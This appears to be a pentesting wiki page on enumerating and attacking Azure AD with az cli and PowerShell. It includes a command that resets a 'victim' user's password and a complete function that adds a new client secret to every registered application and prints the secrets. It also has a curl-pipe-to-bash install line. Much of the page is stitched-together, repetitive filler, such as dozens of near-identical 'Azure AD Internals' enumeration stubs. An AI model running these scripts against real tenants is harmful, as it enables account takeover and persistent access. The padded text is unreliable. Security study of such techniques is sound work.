Az - AzureAD (AAD)

Basic Information

Azure Active Directory (Azure AD) is Microsoft's cloud-based identity and access management service. It is essential for letting employees sign in and access resources both inside and outside the organization, including Microsoft 365, the Azure portal and a wide range of other SaaS applications. Azure AD's design focuses on providing core identity services, in particular authentication, authorization and user management.

Key features of Azure AD include multi-factor authentication and conditional access, together with seamless integration with other Microsoft security services. These features significantly raise the security of user identities and let organizations implement and enforce their access policies effectively. As a fundamental part of Microsoft's cloud service ecosystem, Azure AD is central to cloud-based management of user identities.

Entities

Enumeration

For this enumeration you can use the az cli tool, the PowerShell module AzureAD (or AzureAD Preview) and the Az PowerShell module.

On Linux you need to install PowerShell Core:

sudo apt-get update
sudo apt-get install -y wget apt-transport-https software-properties-common

# Ubuntu 20.04
wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb

# Update repos
sudo apt-get update
sudo add-apt-repository universe

# Install & start powershell
sudo apt-get install -y powershell
pwsh

# Az cli
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Module differences

  • AzureAD is a PowerShell module from Microsoft for managing Azure AD. It doesn't show all the properties of Azure AD objects and can't be used to retrieve information about Azure resources.

  • Az PowerShell is a module for managing Azure resources from the PowerShell command line.

Connection

az login #This will open the browser
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity (metadata)
az login --identity -u /subscriptions/<subscriptionId>/resourcegroups/myRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/myID #Login with user managed identity
# Login as service principal
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p VerySecret --tenant contoso.onmicrosoft.com #With password
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com #With cert

# Request access token (ARM)
az account get-access-token
# Request access token for different resource. Supported tokens: aad-graph, arm, batch, data-lake, media, ms-graph, oss-rdbms
az account get-access-token --resource-type aad-graph

# If you want to configure some defaults
az configure

# Get user logged-in already
az ad signed-in-user show

# Help
az find "vm" # Find vm commands
az vm -h # Get subcommands
az ad user list --query-examples # Get examples

When you log in to Azure through the CLI with any program, you are using an Azure application from a tenant that belongs to Microsoft. These applications, like the ones you can create in your own account, have a client ID. You can't see all of them in the lists of allowed applications shown in the console, but they are allowed by default.

For example, a PowerShell script that authenticates uses an app with the client ID 1950a258-227b-4e31-a9cf-717495945fc2. Even though the app isn't shown in the console, a sysadmin could block that application so users can't access it through tools that connect via this app.

However, there are other client IDs of applications that allow you to connect to Azure:

# The important part is the ClientId, which identifies the application to login inside Azure

$token = Invoke-Authorize -Credential $credential `
-ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
-Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
-Scope 'openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
-Scope 'openid' `
-Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue
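From the defender's side, the point of the passage above is that a Conditional Access policy scoped to the visible app list still leaves these first-party client IDs usable. The following is an added example (not HackTricks code) that reviews sign-in log records for exactly the client IDs listed on this page and reports which users signed in through them without a Conditional Access policy being applied. The records are constructed and follow the field names of Entra sign-in log entries (appId, userPrincipalName, conditionalAccessStatus); the labels attached to each client ID are taken from what this page says about them, nothing more.

```python
import json

# Client IDs listed on this page: the first is the one used by the
# authenticating PowerShell script, the other three are the alternative
# client IDs the page shows with Invoke-Authorize. Labels are descriptive only.
PAGE_CLIENT_IDS = {
    "1950a258-227b-4e31-a9cf-717495945fc2": "PowerShell script client ID (page example)",
    "1dfb5f98-f363-4b0f-b63a-8d20ada1e62d": "alternative client ID #1 (page example)",
    "65611c08-af8c-46fc-ad20-1888eb1b70d9": "alternative client ID #2 (page example)",
    "d3ce4cf8-6810-442d-b42e-375e14710095": "alternative client ID #3 (page example)",
}

# Constructed sample sign-in records (invented users and values); the field
# names mirror Entra sign-in log entries so the same logic applies to an export.
SAMPLE_SIGNINS = json.dumps([
    {"userPrincipalName": "alice@corp.example",
     "appId": "1950a258-227b-4e31-a9cf-717495945fc2",
     "appDisplayName": "Azure PowerShell", "conditionalAccessStatus": "success"},
    {"userPrincipalName": "bob@corp.example",
     "appId": "65611c08-af8c-46fc-ad20-1888eb1b70d9",
     "appDisplayName": "", "conditionalAccessStatus": "notApplied"},
    {"userPrincipalName": "carol@corp.example",
     "appId": "ffffffff-0000-0000-0000-000000000000",
     "appDisplayName": "Corp Intranet", "conditionalAccessStatus": "success"},
    {"userPrincipalName": "dave@corp.example",
     "appId": "d3ce4cf8-6810-442d-b42e-375e14710095",
     "appDisplayName": "", "conditionalAccessStatus": "notApplied"},
])


def flag_cli_signins(signins_json, watched=PAGE_CLIENT_IDS):
    """Return the sign-ins that used one of the watched client IDs.

    Each hit carries a `no_ca` flag when no Conditional Access policy was
    applied ("success" is the only status meaning a policy was evaluated and
    satisfied), which is the case an admin relying on CA for MFA cares about.
    """
    hits = []
    for rec in json.loads(signins_json):
        app_id = rec.get("appId", "").lower()
        if app_id in watched:
            hits.append({
                "user": rec["userPrincipalName"],
                "appId": app_id,
                "label": watched[app_id],
                "no_ca": rec.get("conditionalAccessStatus") != "success",
            })
    return hits


def summarize(hits):
    """Count watched-app sign-ins per user and how many of them had no CA applied."""
    out = {}
    for h in hits:
        entry = out.setdefault(h["user"], {"total": 0, "without_ca": 0})
        entry["total"] += 1
        if h["no_ca"]:
            entry["without_ca"] += 1
    return out


if __name__ == "__main__":
    for user, counts in summarize(flag_cli_signins(SAMPLE_SIGNINS)).items():
        print(f"{user}: {counts['total']} sign-in(s) via listed client IDs, "
              f"{counts['without_ca']} without Conditional Access applied")
```

Feeding a real export in (for instance the JSON from an Entra sign-in log download) only requires replacing the constructed `SAMPLE_SIGNINS`; the `watched` dictionary can be extended with any other first-party client IDs the tenant decides to monitor.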

Users

# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "test@corp.onmicrosoft.com"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from AzureAD
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi==null]"
az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi!=null]"
az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user
az role assignment list --include-groups --include-classic-administrators true --assignee <email>
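The JMESPath and findstr filters above each answer one question about the user list. As an added example (not part of the original page), the following Python script applies the same three checks offline to the JSON that `az ad user list -o json` produces: splitting cloud-only from on-prem-synced accounts by `onPremisesSecurityIdentifier`, matching "admin" in display names, and finding non-null attribute values that mention "password". The user records are constructed for this example and contain only the fields the checks use.

```python
import json

# Constructed sample in the shape of `az ad user list -o json` output; every
# value is invented, and only the attributes used by the checks are present.
SAMPLE_USERS_JSON = json.dumps([
    {"displayName": "Global Admin", "userPrincipalName": "gadmin@corp.onmicrosoft.com",
     "onPremisesSecurityIdentifier": None, "jobTitle": None},
    {"displayName": "Jane Doe", "userPrincipalName": "jane@corp.onmicrosoft.com",
     "onPremisesSecurityIdentifier": "S-1-5-21-1111-2222-3333-1105",
     "jobTitle": "Engineer", "department": "IT"},
    {"displayName": "Svc Backup", "userPrincipalName": "svc-backup@corp.onmicrosoft.com",
     "onPremisesSecurityIdentifier": "S-1-5-21-1111-2222-3333-1203",
     "jobTitle": "temp password: Summer2024!", "department": None},
    {"displayName": "Helpdesk Administrator", "userPrincipalName": "hd@corp.onmicrosoft.com",
     "onPremisesSecurityIdentifier": None, "jobTitle": "Support"},
])


def split_by_origin(users):
    """Cloud-only users have no onPremisesSecurityIdentifier; synced users carry the AD SID."""
    cloud_only = [u["userPrincipalName"] for u in users
                  if u.get("onPremisesSecurityIdentifier") is None]
    synced = [u["userPrincipalName"] for u in users
              if u.get("onPremisesSecurityIdentifier") is not None]
    return cloud_only, synced


def find_by_name(users, needle="admin"):
    """Case-insensitive substring match on displayName, like `findstr /i "admin"`."""
    return [u["displayName"] for u in users
            if needle.lower() in (u.get("displayName") or "").lower()]


def find_secret_bearing_attributes(users, needle="password"):
    """Return (upn, attribute, value) for non-null string values that mention the needle.

    Equivalent in spirit to `az ad user list | findstr /i "password" | findstr /v "null,"`,
    except that only attribute values are inspected, not attribute names.
    """
    hits = []
    for u in users:
        for attr, val in u.items():
            if isinstance(val, str) and needle.lower() in val.lower():
                hits.append((u["userPrincipalName"], attr, val))
    return hits


def audit_users(users_json):
    """Run all three checks over the raw JSON and return one report dictionary."""
    users = json.loads(users_json)
    cloud_only, synced = split_by_origin(users)
    return {
        "cloud_only": cloud_only,
        "synced": synced,
        "admin_like": find_by_name(users),
        "secret_attributes": find_secret_bearing_attributes(users),
    }


if __name__ == "__main__":
    print(json.dumps(audit_users(SAMPLE_USERS_JSON), indent=2))
```

Running it against a real export (`az ad user list -o json > users.json`, then loading the file instead of `SAMPLE_USERS_JSON`) gives an audit a tenant owner can act on: credentials stored in profile fields such as `jobTitle` are visible to every user in the tenant by default and should be removed, not merely noted.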

Change user password

$password = "ThisIsTheNewPassword.!123" | ConvertTo-SecureString -AsPlainText -Force

(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set-AzureADUserPassword -Password $password -Verbose

MFA & Conditional Access Policies

It is highly recommended to add MFA for every user. However, some companies may not set it, or may enable it with a Conditional Access policy: the user is prompted for MFA when logging in from a specific location, browser, or under certain conditions. These policies, if not configured correctly, are prone to bypasses. Check:

Az - Conditional Access Policies / MFA Bypass

Groups

# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?contains(displayName,'admin')].displayName"
# All groups from AzureAD
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi==null]"
az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi!=null]"
az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get Apps where a group has a role (role not shown)
Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *

Azure AD Enumeration

User Enumeration

User enumeration can be performed through the login interface by identifying different responses for valid and invalid users.

Tools

  • Azure AD Internals: A tool that can be used to enumerate users in Azure AD.

Group Enumeration

Group enumeration can be performed by identifying the response when requesting information about a specific group.

Tools

  • Azure AD Internals: This tool can also be used to enumerate groups in Azure AD.

Application Enumeration

Application enumeration involves identifying applications registered in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate applications registered in Azure AD.

Device Enumeration

Device enumeration involves identifying devices registered in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating devices registered in Azure AD.

Service Principal Enumeration

Service principal enumeration involves identifying service principals in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate service principals in Azure AD.

Tenant Enumeration

Tenant enumeration involves identifying the tenant ID and tenant domain in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate tenant information in Azure AD.

Domain Enumeration

Domain enumeration involves identifying the domains associated with the Azure AD tenant.

Tools

  • Azure AD Internals: This tool can help enumerate domains associated with the Azure AD tenant.

Policy Enumeration

Policy enumeration involves identifying the policies configured in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating policies configured in Azure AD.

Role Enumeration

Role enumeration involves identifying the roles assigned in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate roles assigned in Azure AD.

Certificate Enumeration

Certificate enumeration involves identifying certificates registered in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate certificates registered in Azure AD.

Key Enumeration

Key enumeration involves identifying keys registered in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating keys registered in Azure AD.

Application Registration Enumeration

Application registration enumeration involves identifying applications registered in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate applications registered in Azure AD.

OAuth2 Permission Enumeration

OAuth2 permission enumeration involves identifying OAuth2 permissions granted in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate OAuth2 permissions granted in Azure AD.

App Registration Enumeration

App registration enumeration involves identifying applications registered in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate applications registered in Azure AD.

App Role Enumeration

App role enumeration involves identifying app roles assigned in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate app roles assigned in Azure AD.

App Secret Enumeration

App secret enumeration involves identifying application secrets in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating application secrets in Azure AD.

App Credential Enumeration

App credential enumeration involves identifying application credentials in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate application credentials in Azure AD.

App Permission Enumeration

App permission enumeration involves identifying application permissions in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate application permissions in Azure AD.

App Cert Enumeration

App cert enumeration involves identifying application certificates in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating application certificates in Azure AD.

App Key Enumeration

App key enumeration involves identifying application keys in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate application keys in Azure AD.

App Federation Enumeration

App federation enumeration involves identifying application federations in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate application federations in Azure AD.

App SAML Enumeration

App SAML enumeration involves identifying SAML configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating SAML configurations in Azure AD.

App OpenID Enumeration

App OpenID enumeration involves identifying OpenID configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate OpenID configurations in Azure AD.

App OAuth2 Enumeration

App OAuth2 enumeration involves identifying OAuth2 configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate OAuth2 configurations in Azure AD.

App Graph Enumeration

App Graph enumeration involves identifying Microsoft Graph configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating Microsoft Graph configurations in Azure AD.

App API Enumeration

App API enumeration involves identifying API configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate API configurations in Azure AD.

App Delegation Enumeration

App delegation enumeration involves identifying delegation configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate delegation configurations in Azure AD.

App User Enumeration

App user enumeration involves identifying user configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating user configurations in Azure AD.

App Group Enumeration

App group enumeration involves identifying group configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate group configurations in Azure AD.

App Device Enumeration

App device enumeration involves identifying device configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate device configurations in Azure AD.

App Service Principal Enumeration

App service principal enumeration involves identifying service principal configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating service principal configurations in Azure AD.

App Tenant Enumeration

App tenant enumeration involves identifying tenant configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate tenant configurations in Azure AD.

App Domain Enumeration

App domain enumeration involves identifying domain configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate domain configurations in Azure AD.

App Policy Enumeration

App policy enumeration involves identifying policy configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating policy configurations in Azure AD.

App Role Enumeration

App role enumeration involves identifying role configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can be used to enumerate role configurations in Azure AD.

App Certificate Enumeration

App certificate enumeration involves identifying certificate configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate certificate configurations in Azure AD.

App Key Enumeration

App key enumeration involves identifying key configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can assist in enumerating key configurations in Azure AD.

App OAuth2 Permission Enumeration

App OAuth2 permission enumeration involves identifying OAuth2 permission configurations in Azure AD.

Tools

  • Azure AD Internals: This tool can help enumerate OAuth2 permission configurations in Azure AD.

The same group enumeration with the AzureAD PowerShell module:

# Enumerate Groups
Get-AzureADGroup -All $true
# Get info of 1 group
Get-AzADGroup -DisplayName <group_name> | fl
# Get "admin" groups
Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin"
Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin"
# Get groups allowing dynamic membership
Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
# All groups that are from Azure AD
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All groups that are synced from on-prem (note that security groups are not synced)
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Get members of a group
Get-AzureADGroupMember -ObjectId <group_id>
# Get roles of group
Get-AzureADMSGroup -SearchString "Contoso_Helpdesk_Administrators" #Get group id
Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-b4d1-4055-9c94-320542efd653'"
# Get Administrative Units of a group
$groupObj = Get-AzureADGroup -Filter "displayname eq 'TestGroup'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $groupObj.ObjectId} }

Azure AD Identities and Groups

Overview

Azure AD identities and groups are core objects managed in Azure AD. Identities can represent users or applications, while groups are collections of users or applications. This section presents several Azure PowerShell commands that help manage identities and groups in Azure AD.

Managing identities

User identities

User identities can be managed with Azure PowerShell using commands such as New-AzADUser, Get-AzADUser, Set-AzADUser and Remove-AzADUser.

# Example: create a new user (-MailNickname is required and -Password expects a SecureString)
New-AzADUser -DisplayName "Max Mustermann" -UserPrincipalName "max@beispiel.com" -MailNickname "max" -Password (ConvertTo-SecureString "Passwort123!" -AsPlainText -Force)

Application identities

When managing application identities, commands such as New-AzADApplication, Get-AzADApplication, Set-AzADApplication and Remove-AzADApplication are useful.

# Example: create a new application
New-AzADApplication -DisplayName "MeineApp" -IdentifierUris "http://meineapp" -HomePage "http://meineapp.com"

Managing groups

User groups

User groups can be managed with commands such as New-AzADGroup, Get-AzADGroup, Set-AzADGroup and Remove-AzADGroup.

# Example: create a new security group (-MailNickname is required; -SecurityEnabled is a switch)
New-AzADGroup -DisplayName "IT-Abteilung" -MailNickname "IT" -SecurityEnabled

Application groups

Application groups can likewise be managed with New-AzADGroup, Get-AzADGroup, Set-AzADGroup and Remove-AzADGroup.

# Example: create a new application group
New-AzADGroup -DisplayName "MeineApp-Gruppe" -MailNickname "MeineAppGruppe" -SecurityEnabled

Further information

For more information on Azure AD identities and groups and the available PowerShell commands, consult the official Azure PowerShell documentation.

# Get all groups
Get-AzADGroup
# Get details of a group
Get-AzADGroup -ObjectId <id>
# Search group by string
Get-AzADGroup -SearchString "admin" | fl * #Search at the beginning of DisplayName
Get-AzADGroup |?{$_.Displayname -match "admin"}
# Get members of group
Get-AzADGroupMember -GroupDisplayName <group_display_name>
# Get roles of group
Get-AzRoleAssignment -ResourceGroupName <resource_group_name>

Add users to a group

Owners of the group can add new users to the group

Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose

Groups can be dynamic, which basically means that a user is added to a group when he meets certain conditions. Of course, if the conditions are based on attributes the user can control, he could abuse this feature to get into other groups. Check how dynamic groups can be abused on the following page:

Az - Dynamic Groups Privesc

Service Principals / Enterprise Applications

Note that what PowerShell terminology calls a Service Principal is called an Enterprise Application in the Azure portal (web).

# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o table
# Get service principals owned by the current user
az ad sp list --show-mine
# List apps that have password credentials
az ad sp list --all --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad sp list --all --query "[?keyCredentials != null].displayName"

Azure AD

Azure AD is Microsoft's cloud-based identity and access management service that lets organizations manage user accounts and access rights. It offers features such as single sign-on (SSO), multi-factor authentication and integration with other Microsoft services.

Security reviews

A security review of Azure AD should identify weaknesses such as weak passwords, unused accounts, excessive permissions and unprotected applications. Regularly reviewing and fixing these weaknesses minimizes security risk.

Logging and monitoring

Logging and monitoring activity in Azure AD is essential for detecting and responding to suspicious activity. Monitoring sign-in attempts, permission changes and other activities allows security incidents to be detected and contained early.

Access control

Implementing strict access controls in Azure AD is important to ensure that only authorized users can access resources. This includes using role-based access control (RBAC), limiting administrator rights, and regularly reviewing and updating access permissions.

# Get Service Principals
Get-AzureADServicePrincipal -All $true
# Get details about a SP
Get-AzureADServicePrincipal -ObjectId <id> | fl *
# Get SP by string name or Id
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -match "app"} | fl
Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match "103947652-1234-5834-103846517389"}
# Get owner of SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwner |fl *
# Get objects owned by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwnedObject
# Get objects created by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalCreatedObject
# Get groups where the SP is a member
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembership |fl *

Azure AD

Azure AD is Microsoft's identity and access management service for the Azure cloud. Reviewing the security of Azure AD is important because it plays a central role in authenticating and authorizing users in the Azure cloud.

Reviewing the security of Azure AD

Various techniques can be applied to review the security of Azure AD, including:

  • Reviewing permissions and roles in Azure AD

  • Reviewing configuration settings for security features

  • Reviewing user accounts and their permissions

  • Reviewing sign-in activity and suspicious patterns

It is important to perform regular security reviews of Azure AD to identify and fix potential security gaps.

# Get SPs
Get-AzADServicePrincipal
# Get info of 1 SP
Get-AzADServicePrincipal -ObjectId <id>
# Search SP by string
Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>

This script uses the Microsoft Graph API to retrieve information about users, groups and applications (the example below queries the applications endpoint). It can be useful for getting an overview of the Azure AD configuration and identifying potential security gaps.

$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value

The owner of a service principal can change its password.

List and try to add a client secret to each enterprise app

```powershell
# Just call Add-AzADAppSecret
Function Add-AzADAppSecret
{
<#
.SYNOPSIS
Add client secret to the applications.
.PARAMETER GraphToken
Pass the Graph API Token
.EXAMPLE
PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'
.LINK
https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http
https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http
#>
    [CmdletBinding()]
    param( [Parameter(Mandatory=$True)] [String] $GraphToken = $null )

    $AppList = $null; $AppPassword = $null

    # List All the Applications
    $Params = @{
        "URI"     = "https://graph.microsoft.com/v1.0/applications"
        "Method"  = "GET"
        "Headers" = @{ "Content-Type" = "application/json"; "Authorization" = "Bearer $GraphToken" }
    }
    try { $AppList = Invoke-RestMethod @Params -UseBasicParsing } catch { }

    # Add Password in the Application
    if($AppList -ne $null) {
        [System.Collections.ArrayList]$Details = @()
        foreach($App in $AppList.value) {
            $ID = $App.ID
            $psobj = New-Object PSObject
            $Params = @{
                "URI"     = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
                "Method"  = "POST"
                "Headers" = @{ "Content-Type" = "application/json"; "Authorization" = "Bearer $GraphToken" }
            }
            $Body = @{ "passwordCredential" = @{ "displayName" = "Password" } }
            try {
                $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)
                Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID
                Add-Member -InputObject $psobj -NotePropertyName "App ID"    -NotePropertyValue $App.appId
                Add-Member -InputObject $psobj -NotePropertyName "App Name"  -NotePropertyValue $App.displayName
                Add-Member -InputObject $psobj -NotePropertyName "Key ID"    -NotePropertyValue $AppPassword.keyId
                Add-Member -InputObject $psobj -NotePropertyName "Secret"    -NotePropertyValue $AppPassword.secretText
                $Details.Add($psobj) | Out-Null
            }
            catch { Write-Output "Failed to add new client secret to '$($App.displayName)' Application." }
        }
        if($Details -ne $null) {
            Write-Output ""
            Write-Output "Client secret added to : "
            Write-Output $Details | fl *
        }
    }
    else { Write-Output "Failed to Enumerate the Applications." }
}
```


Roles

# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"

Azure AD Enumeration

Azure AD Internals can be used to enumerate the following Azure AD objects and settings:

  • Users (user enumeration can also be performed through the login interface, by identifying different responses for valid and invalid users)

  • Groups and their members

  • Devices registered in Azure AD

  • Applications, app registrations and OAuth applications

  • Service principals

  • Tenant information

  • Domains associated with Azure AD

  • Policies

  • Roles assigned in Azure AD

  • Certificates

  • App roles, secrets, permissions, credentials and scopes

  • App redirect URIs, reply URLs, sign-on URLs and home realms

  • App APIs, consents, federation, SAML and OpenID Connect configurations

  • App branding, extensions and delegations

  • Users and groups associated with applications

  • App permission grants and app role, credential, API, extension, delegation, user, group and registration assignments

# Get all available role templates
Get-AzureADDirectoryRoleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *

# Get role definitions on the subscription
Get-AzRoleDefinition
# Get Role definition
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get roles of a user or resource
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>
# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value

Devices

# If you know how to do this send a PR!

Azure AD Enumeration

Azure AD enumeration is the process of gathering information about Azure AD users, groups, applications, and permissions. This information can be used by attackers to identify potential targets and plan further attacks.

Tools for Azure AD Enumeration

There are several tools available for enumerating Azure AD, such as:

  • Azure AD Recon: A tool for gathering information about Azure AD users, groups, and applications.

  • Azure AD Exploitation Framework (AADExPloitation): A framework for enumerating Azure AD users, groups, and applications, as well as exploiting misconfigurations.

Techniques for Azure AD Enumeration

Some common techniques for Azure AD enumeration include:

  • User Enumeration: Enumerating Azure AD users to gather information such as usernames, email addresses, and group memberships.

  • Group Enumeration: Enumerating Azure AD groups to identify group names, descriptions, and members.

  • Application Enumeration: Enumerating Azure AD applications to discover application names, permissions, and configurations.

  • Permission Enumeration: Enumerating Azure AD permissions to identify users with elevated privileges and misconfigured permissions.

By using these tools and techniques, attackers can gather valuable information about an organization's Azure AD environment and potentially exploit misconfigurations or vulnerabilities.

# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Registered users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
